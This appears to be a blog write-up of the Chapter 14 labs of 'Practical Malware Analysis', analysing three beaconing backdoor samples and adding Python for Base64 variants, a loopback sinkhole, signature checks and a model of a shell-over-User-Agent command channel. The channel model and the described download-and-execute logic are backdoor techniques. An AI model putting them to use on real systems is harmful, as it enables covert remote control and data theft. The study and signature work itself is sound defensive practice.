"Practical Malicious Code Analysis" Experiment - Labs-14

"Practical Malicious Code Analysis" Experiment - Labs-14

A record of the experiments from the labs in "Practical Malware Analysis" (Chapter 14); related links:

Labs-14-01 Experiment

Sample: Lab14-01.exe

Static analysis:

  1. Packer check: not packed
  2. Imports:
    Kernel32.dll: Sleep, process creation and termination, library loading, etc.
    ADVAPI32.dll: retrieving or setting system information, e.g. obtaining the current user name
    Urlmon.dll: URLDownloadToCacheFileA, which downloads a URL to the cache
  3. Strings:
    A Base64 alphabet string appears, so Base64 encoding is probably used.
    Network resource strings (URLs) appear, so the sample probably requests resources over the network.
  4. Then a preliminary dynamic analysis (recorded below)

IDA analysis

  1. The program first obtains the HWID (hardware profile identifier) of the current host
  2. The HWID is formatted into a string in a fixed way and saved in the variable var_10098
  3. The HWID string and the user name are concatenated and saved in the variable var_10160
  4. Next the function calls sub_4010BB and then enters an infinite loop whose body calls sub_4011A3
  5. Looking at sub_4010BB first: its parameters are exactly the concatenated HWID/user-name string and the address of a newly allocated buffer.
  6. Inside, the function turns out to be a typical Base64 encoding routine; the object being encoded is the string passed in as a parameter.
  7. So sub_4010BB is a Base64 encoder, and the encoded data is stored in the variable var_10000.
  8. Back in the loop body, sub_4011A3 is called with the encoded string as its parameter.
  9. Inside sub_4011A3:
    (1) The function begins with string concatenation: the encoded string, its last character and the domain-name string are spliced together into a network resource address (URL). The result is saved in var_210.
    (2) URLDownloadToCacheFileA is then called to request the resource and cache it. The cached file name is stored in the ApplicationName variable.
    (3) Finally a new process is created to execute the cached file.
  10. That completes the analysis of the program. Summary of its behaviour:
    (1) Obtain the HWID and the user name and concatenate them
    (2) Base64-encode the concatenated string
    (3) Concatenate the encoded string with the fixed domain string to obtain the URL
    (4) Request the URL, cache the response and execute the cached file in a new process
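
The Base64 variant from steps 6 to 7 and the URL assembly from step 9 can be made concrete. The following Python code is an added example written for these notes, not code from the lab sample or the book: it implements a Base64 codec whose alphabet and pad character are parameters, so one routine covers both the 'a' padding discussed in question 4 below and the custom alphabets met in the later labs of this chapter; it then builds the beacon URL in the layout described above and adds a shape-based signature check for that URL. The domain http://c2.example, the HWID and user values, the rotated alphabet and the direct concatenation of HWID and user name (no separator) are assumptions, not values taken from the sample.

```python
"""Base64 variants in the Chapter 14 labs: a codec whose alphabet and pad
character are parameters, the Lab14-01 beacon URL built from it, and a
signature check for that URL shape."""
import re
import string

STD_ALPHABET = string.ascii_uppercase + string.ascii_lowercase + string.digits + "+/"
# Hypothetical custom alphabet (a rotation of the standard one) standing in for
# the per-sample alphabets of Lab14-02/03; the real alphabets are not given above.
ROTATED_ALPHABET = STD_ALPHABET[13:] + STD_ALPHABET[:13]


def b64_encode(data: bytes, alphabet: str = STD_ALPHABET, pad: str = "=") -> str:
    """Encode with an arbitrary 64-symbol alphabet and pad character.
    pad='a' reproduces the Lab14-01 quirk: a standard encoder except that the
    trailing padding is written as 'a' instead of '='."""
    assert len(alphabet) == 64 and len(set(alphabet)) == 64
    out = []
    for i in range(0, len(data), 3):
        chunk = data[i:i + 3]
        n = int.from_bytes(chunk.ljust(3, b"\0"), "big")      # 24-bit group, zero-filled
        sextets = [(n >> s) & 0x3F for s in (18, 12, 6, 0)]
        keep = len(chunk) + 1                                  # 1 byte->2 chars, 2->3, 3->4
        out.append("".join(alphabet[v] for v in sextets[:keep]) + pad * (4 - keep))
    return "".join(out)


def b64_decode(text: str, alphabet: str = STD_ALPHABET, pad: str = "=") -> bytes:
    """Inverse of b64_encode. Padding is only recognised at the end of the last
    group, so an 'a' inside Lab14-01 data still decodes as the value 26. When the
    pad symbol is also a data symbol, a final genuine 'a' is indistinguishable
    from padding; this decoder assumes padding (the caveat for analysts)."""
    if len(text) % 4:
        raise ValueError("length is not a multiple of 4")
    rev = {c: i for i, c in enumerate(alphabet)}
    out = bytearray()
    for i in range(0, len(text), 4):
        group = text[i:i + 4]
        npad = 0
        if i + 4 == len(text):                                 # last group only
            while npad < 2 and group[3 - npad] == pad:
                npad += 1
        vals = [rev[c] for c in group[:4 - npad]] + [0] * npad
        n = (vals[0] << 18) | (vals[1] << 12) | (vals[2] << 6) | vals[3]
        out += n.to_bytes(3, "big")[:3 - npad]
    return bytes(out)


def lab14_01_beacon(hwid: str, user: str, domain: str) -> str:
    """URL requested by Lab14-01 as described above: <domain>/<encoded>/<last char>.png,
    where <encoded> is the HWID string followed by the user name, Base64 with
    'a' padding. Direct concatenation without a separator is an assumption."""
    enc = b64_encode((hwid + user).encode(), pad="a")
    return f"{domain}/{enc}/{enc[-1]}.png"


BEACON_RE = re.compile(r"^https?://[^/]+/([A-Za-z0-9+/]{4,})/([A-Za-z0-9+/])\.png$")


def matches_lab14_01_beacon(url: str) -> bool:
    """Signature idea: a Base64-looking path segment followed by its own last
    character with a .png suffix. Matching the shape rather than the domain
    survives a change of C&C host."""
    m = BEACON_RE.match(url)
    return bool(m) and m.group(1)[-1] == m.group(2)


if __name__ == "__main__":
    url = lab14_01_beacon("HWID", "user", "http://c2.example")   # constructed values
    print(url)                                                     # .../SFdJRHVzZXIa/a.png
    token = url.rsplit("/", 2)[1]
    print(b64_decode(token, pad="a"))                              # b'HWIDuser'
    print(b64_encode(b"Man", ROTATED_ALPHABET), matches_lab14_01_beacon(url))
```

The 'a'-padded form has an inherent ambiguity that a decoder cannot resolve: when the real data ends in the symbol 'a', the last character looks exactly like padding. An analyst recovering HWID/user-name pairs from captured URLs should therefore try both interpretations when the decoded value looks truncated.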

Dynamic Analysis

  1. Open Process Monitor (PM) and run the program under monitoring

  2. Registry operations
    Several registry keys under the network connection settings are modified

  3. File operations
    (1) Cab4EA3.tmp and Tar4EA4.tmp are created and modified in the Temp folder
    (2) These files are then deleted
    (3) They are temporary files produced during the network access and are removed when the program ends.

  4. Network operations: a network connection to 192.0.78.24

Build HTTP service for dynamic analysis

Since the C&C server used in the lab cannot be reached, we built a local environment for testing. An HTTP service was set up for the analysis because it was unclear in which directory URLDownloadToCacheFileA stores the cached resource.

  1. Start a simple HTTP server with Python (listening on port 8889)
  2. Create the directory and file malwareana/index.html in the current user's home directory, where the server is started
  3. Open PM for monitoring
  4. Open the program in OllyDbg (OD) and set breakpoints at 004011F9 and 0040120E: URLDownloadToCacheFileA is called between these two addresses, so this is where the URL has to be patched. At the same time note one of the parameters of URLDownloadToCacheFileA, the cache path buffer ApplicationName (address 0x0011F9C4)
  5. Single-step with F8 until the URL appears
  6. Follow it to the memory address where the URL is stored
  7. Modify the URL in the dump window. Here it is changed to http://localhost:8889/malwareana/index.html; be sure to set the byte following "html" to 0x00 so that the string is terminated there.
  8. Continue running the program (F9). It now breaks at 0040120E. In the dump window follow the cache path ApplicationName at 0x0011F9C4 to obtain the directory in which the system cached the resource.
  9. PM has recorded the file operations: the file index[1].html is created (because index.html already exists in the cache directory)
  10. Go to the cache directory and locate the cached file: it is the file served by the local HTTP server.
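
A plain Python one-line HTTP server only shows that a request arrived. The following script is an added example written for these notes (not code from the original write-up): it serves one fixed page on the loopback interface and records the request path and User-Agent of every GET, so the beacon can be read off the server log as well as from memory in OllyDbg. It assumes loopback networking is available; the beacon path and User-Agent in the demo are constructed sample values, not a capture from the sample.

```python
"""Throwaway HTTP sinkhole for the local setup above: serves one fixed page and
logs each request's path and User-Agent instead of only answering it."""
import threading
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

# Stands in for malwareana/index.html from the steps above.
PAYLOAD = b"<html><body>served by the analysis host</body></html>\n"


class BeaconHandler(BaseHTTPRequestHandler):
    """Answer every GET with PAYLOAD and append (path, User-Agent) to server.log."""

    def do_GET(self):
        self.server.log.append((self.path, self.headers.get("User-Agent", "")))
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", str(len(PAYLOAD)))
        self.end_headers()
        self.wfile.write(PAYLOAD)

    def log_message(self, fmt, *args):
        pass                                      # we keep our own structured log


class SinkholeServer(HTTPServer):
    def __init__(self, address):
        super().__init__(address, BeaconHandler)
        self.log = []                             # list of (path, user_agent)


def start_sinkhole(port: int = 0) -> SinkholeServer:
    """Serve on 127.0.0.1 in a background thread; port 0 picks a free port
    (use 8889 to match the URL patched into the sample above)."""
    srv = SinkholeServer(("127.0.0.1", port))
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def probe(srv: SinkholeServer, path: str, user_agent: str) -> bytes:
    """Play the sample's part: GET path from the sinkhole with a chosen User-Agent.
    An empty ProxyHandler keeps any http_proxy setting from diverting loopback."""
    url = f"http://127.0.0.1:{srv.server_address[1]}{path}"
    opener = urllib.request.build_opener(urllib.request.ProxyHandler({}))
    req = urllib.request.Request(url, headers={"User-Agent": user_agent})
    with opener.open(req, timeout=5) as resp:
        return resp.read()


def capture_beacon(path: str, user_agent: str):
    """Start a sinkhole, send one request and return (body, (path, ua) as logged)."""
    srv = start_sinkhole()
    try:
        body = probe(srv, path, user_agent)
        return body, srv.log[0]
    finally:
        srv.shutdown()
        srv.server_close()


if __name__ == "__main__":
    # Constructed beacon in the Lab14-01 layout (encoded token, then its last
    # character plus .png); not a real capture.
    body, (path, ua) = capture_beacon("/SFdJRHVzZXIa/a.png", "constructed-agent")
    print(len(body), "bytes served; logged", path, "from User-Agent", ua)
```

To reproduce the lab setup, call start_sinkhole(8889) and leave the process running while the patched sample is stepped in OllyDbg; srv.log then holds exactly what the sample sent, which is what step 8 above recovers by hand from the ApplicationName buffer.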

Questions

  1. What networking libraries does the malware use? What are their advantages?
    Answer: It uses URLDownloadToCacheFileA, which works through the COM interface. When malware uses COM, most of the content of the HTTP request is generated by Windows itself, so the request offers little that a targeted network signature could latch onto.
  2. What source elements are used to construct the network beacon, and what conditions would cause the beacon to change?
    Answer: The beacon contains the host's HWID and the user name; the HWID is fixed for a given machine, while the user name changes with the logged-on user.
  3. Why might an attacker be interested in the information embedded in the beacon?
    Answer: To identify specific users and hosts and then carry out targeted follow-up attacks.
  4. Does the malware use standard Base64 encoding? If not, how is the encoding unusual?
    Answer: Not the standard form: standard Base64 pads the end with "=" when the input length is not a multiple of 3, whereas this program pads with 'a'.
  5. What is the main purpose of the malware?
    Answer: Send the HWID and user name of the infected host to the C&C, then download and run further malicious code from that site.
  6. What elements of the malware's communication might be effectively detected with network signatures?
    Answer: The domain name, the Base64-like path component and the .png suffix of the URI in the HTTP request.
  7. What mistakes might an analyst make when developing a signature for this malware?
    Answer: ——
  8. What set of signatures would detect this malware (and new variants)?
    Answer: ——

Labs-14-02 Experiment

Sample: Lab14-02.exe

Static analysis:

  1. Packer check: not packed
  2. Imports (a resource section is also discovered):
    KERNEL32.dll: process creation and termination, DuplicateHandle, CreatePipe, file writing, etc.
    USER32.dll: LoadString
    SHELL32.dll: ShellExecute
    WININET.dll: opening a URL, reading a file over the network
    MSVCRT.dll: ——
  3. Hidden resources: a network resource address (URL) is stored in the resource section
  4. Strings:
    The Base64 alphabet string appears, so Base64 encoding is probably used.
    "cmd.exe" appears, so cmd is probably invoked to execute commands.
    "http:...127.0.0.1/tenfour.html" appears, so a network resource is probably accessed.
  5. Then a preliminary dynamic analysis (recorded below)

IDA analysis

  1. main first loads the string from the resource section (the static analysis above already showed that this string is a URL) and saves it in Buffer.
  2. The string is then stored in v4, and two pipes are created; v4 also holds the pipe ends used as the program's input and output.
  3. The other ends of the pipes are placed in the STARTUPINFO structure used to create a new cmd.exe process (as its standard input and output), so the program talks to cmd through the pipes.
  4. In other words, cmd receives the contents of the buffer through one pipe and executes them, and the output goes back into the buffer through the other pipe.
  5. Next a thread is created whose start address is StartAddress
    (1) Following that address: the thread reads the data from the pipe, Base64-encodes it with sub_401000 and saves the encoded data in v3
    (2) Then sub_401750 is called on the encoded data. It has two parameters: the encoded data, and a pointer that traces back to the original buffer at an offset of 0x14 bytes, i.e. the URL string
    (3) Inside sub_401750: the function places the encoded data in the User-Agent field of the HTTP request and then accesses the specified URL.
  6. Further down, the logic forks. One branch terminates the thread (TerminateThread); the other creates a second thread whose start address is sub_4015C0
    (1) This function contains a for loop whose body repeatedly calls sub_401800 to access the network
    (2) The parameters of sub_401800 are the same as those of sub_401750 analysed above: data read from the pipe, and the URL at offset 0x14 (decimal 20) of the buffer. The two functions are presumably similar, which following sub_401800 confirms.
    (3) Besides calling sub_401800, the loop body also stores the network data that is read.
  7. This essentially completes the analysis. The communication model the program sets up can be simplified as follows: data fetched from the URL reaches cmd.exe through one pipe, and cmd.exe's output comes back through the other pipe, is encoded and is sent in the User-Agent header of the next request.
  8. Summary of the program's behaviour
    (1) Load the string resource
    (2) Create pipes for communication between processes
    (3) Create a new process running cmd.exe
    (4) Create a thread that encodes the data and sends it in a network request
    (5) Create a second thread that sends another network request and stores the response

Dynamic Analysis

  1. Open PM for monitoring and run the program
  2. Registry operations: several registry keys are created
  3. File operations:
    cmd.exe is opened, but there is no file-writing operation
  4. Network operations: requests are sent to the local address 127.0.0.1

Questions

  1. What are the advantages and disadvantages of hard-coding an IP address directly in the malware?
    Answer: I don't quite understand what is meant here; let's look at the reference answer.
    [screenshot of the reference answer]
  2. What networking libraries does the malware use? What are the advantages and disadvantages of these libraries?
    Answer: The WinINet library is used. Compared with the Winsock API, the advantage is that the operating system fills in more of the HTTP header fields; the disadvantage is that the library calls require a hard-coded User-Agent to be supplied.
  3. What is the source of the URL used in the malware's beacon? What advantages does this source offer?
    Answer: Reference answer:
    [screenshot of the reference answer]
  4. Which aspect of the HTTP protocol does the malware exploit to accomplish its purpose?
    Answer: It sends information in the User-Agent field, with the data encoded; remote control and arbitrary command execution are achieved through the two pipes.
  5. What kind of information is transmitted in the malware's initial beacon?
    Answer: The (encoded) output produced when cmd is started.
  6. What are the shortcomings in the design of this malware's communication channel?
    Answer: Reference answer:
    [screenshot of the reference answer]
  7. Is the malware's encoding scheme standard?
    Answer: No, it is a custom Base64 encoding.
  8. How is the communication terminated?
    Answer: With the keyword exit; on exit the malware attempts to delete itself.
  9. What is the purpose of this malware? What role might it play in an attacker's toolbox?
    Answer: A simple backdoor.
    [screenshot of the reference answer]
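
The channel summarised in items 4 to 7 of the IDA analysis (a command fed to cmd.exe through a pipe, its output read back, encoded and sent as the User-Agent) can be modelled end to end. The following Python code is an added example for these notes, not the sample's code: it runs a command through a child shell via pipes, wraps the output into the HTTP request shape described above, and shows the operator/detector side that recognises a Base64-shaped User-Agent and decodes it. Standard Base64 stands in for the sample's custom alphabet (question 7), the shell is sh on non-Windows hosts, and the URL assumes that the "..." in the strings listing stands for "//".

```python
"""Model of the Lab14-02 channel: command in through a pipe to a child shell,
output out through the other pipe, encoded into the User-Agent of a GET.
Network I/O is replaced by returning the request text."""
import base64
import re
import subprocess
import sys

# The strings listing shows "http:...127.0.0.1/tenfour.html"; "//" is assumed here.
URL = "http://127.0.0.1/tenfour.html"


def run_through_pipes(command: str) -> bytes:
    """Start a child shell with both standard handles redirected to pipes, write
    one command line to it and read everything it prints back, as the sample
    does with cmd.exe and its two pipes."""
    shell = ["cmd.exe"] if sys.platform == "win32" else ["sh"]
    proc = subprocess.Popen(shell, stdin=subprocess.PIPE, stdout=subprocess.PIPE,
                            stderr=subprocess.STDOUT)
    out, _ = proc.communicate((command + "\n").encode(), timeout=10)
    return out


def build_beacon(output: bytes, url: str = URL) -> str:
    """Wrap shell output into the GET the sample sends: the data rides in the
    User-Agent header, which WinINet lets the caller set freely."""
    host, _, path = url.split("://", 1)[1].partition("/")
    token = base64.b64encode(output).decode()      # stand-in for the custom alphabet
    return (f"GET /{path} HTTP/1.1\r\nHost: {host}\r\n"
            f"User-Agent: {token}\r\nConnection: close\r\n\r\n")


UA_RE = re.compile(r"^User-Agent:[ \t]*(.*?)[ \t]*\r?$", re.M)
B64_TOKEN = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")


def extract_beacon(request: str):
    """Operator/detector side: if the User-Agent is a single Base64-shaped token
    (no spaces, length a multiple of 4, Base64 characters only), decode and
    return it; otherwise None. Browser UAs contain spaces and product/version
    syntax, so they fall through."""
    m = UA_RE.search(request)
    if not m:
        return None
    ua = m.group(1)
    if not ua or len(ua) % 4 or not B64_TOKEN.match(ua):
        return None
    try:
        return base64.b64decode(ua, validate=True)
    except ValueError:
        return None


def session(commands):
    """Run operator commands through the model until 'exit'. Returns a list of
    (command, output recovered by the operator). The sample also deletes
    itself on exit; that part is not modelled."""
    transcript = []
    for cmd in commands:
        if cmd.strip().lower() == "exit":
            break
        request = build_beacon(run_through_pipes(cmd))
        transcript.append((cmd, extract_beacon(request)))
    return transcript


if __name__ == "__main__":
    for cmd, output in session(["echo lab14", "exit", "echo never reached"]):
        print(repr(cmd), "->", output)
```

The detector heuristic is deliberately crude: it flags any header value that is a lone Base64-shaped token, which is what question 2's "hard-coded User-Agent" disadvantage amounts to from the defender's side. A real signature would combine it with the fixed URL path and the absence of normal browser headers.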

Labs-14-03 Experiment

Sample: Lab14-03.exe, an improved version of Lab14-01

Static analysis:

  1. Packer check: not packed
  2. Imports:
    KERNEL32.DLL: file reading and writing, file creation, library loading, etc.
    WININET.DLL: URL access, reading files over the network, etc.
    urlmon.dll: URLDownloadToCacheFileA, which downloads a file to the cache
  3. Strings:
    A Base64-like alphabet string appears, so Base64 may be used to encode data.
    HTTP header fields appear, suggesting network requests;
    .exe file names appear and may be executed;
    URLs appear and may be requested.

IDA analysis

  1. The logic of main is fairly simple: essentially a do-while loop.
  2. In the loop body, sub_401457 is called first. It has two parameters, the string szUrl and a number. Following the function:
    (1) Inside, CreateFileA is first called to open the file 'C:\autobat.exe', and then sub_401372 is called (this is the path taken when the file does not exist yet)
    (2) sub_401372 takes the string 'http://www.practicalmalwareanalysis.com/start.htm', a URL, as its parameter; inside it, the file 'C:\autobat.exe' is created and the URL is written into it.
    (3) Back in sub_401457, ReadFile reads the file's data into lpBuffer; the file is the 'C:\autobat.exe' just created, whose content is exactly the URL 'http://www.practicalmalwareanalysis.com/start.htm'.
  3. So the job of sub_401457 is to create a local file that stores the URL, i.e. a configuration file, and to read the URL from it.
  4. Back in the loop body, sub_4011F3 is called to access the network resource:
    (1) It first initialises the HTTP header fields and then requests the resource at the URL passed in
    (2) After reading the response data into Buffer it searches for the string '<no'
    (3) and then calls sub_401000 for further matching
    (4) The substring from the page that satisfies the match is returned
  5. Next, the returned string is passed to sub_401684
    (1) Inside sub_401684, the string is first truncated and then a switch is performed on its first letter. This suggests that different operations are carried out depending on the command sent by the C&C; the handler for each command was analysed in the annotated listing.
    (2) Note that the encoding part calls sub_401147
    (3) This function differs from traditional Base64: it uses a custom alphabet string
  6. This completes the analysis of the program.
  7. Summary of the program's behaviour
    (1) Create a local configuration file
    (2) Send a network request according to the configuration file, with some HTTP header elements hard-coded
    (3) Store the data returned by the request and check it by string matching
    (4) Decode the returned data; different commands perform different operations: sleep, redirect (modify the local configuration file), download and execute another malicious file, and nop (do nothing).

Questions

  1. What hard-coded elements are in the initial beacon? Which elements could make a good network signature?
  2. What elements of the initial beacon could be detrimental to a durable network signature?
  3. How does the malware obtain commands? What examples from this chapter use a similar approach? What are the advantages of this technique?
  4. When the malware receives input, what checks does it perform to determine whether the input is a useful command? How does the attacker hide the list of commands the malware is looking for?
  5. What type of encoding is used for the command parameters? How does it differ from Base64 encoding? What advantages and disadvantages does it offer?
  6. What commands does the malware accept?
  7. What is the purpose of this malware?
  8. This chapter introduced the idea of targeting independent features in different parts of the code to make network signatures more robust. Which parts of this malware's code or configuration file could be targeted for network signatures?
  9. What set of network signatures should be used to detect this malware?

(I was too lazy (¬‿¬)) Reference answers:
[screenshots of the reference answers]

Origin blog.csdn.net/weixin_39561364/article/details/115938526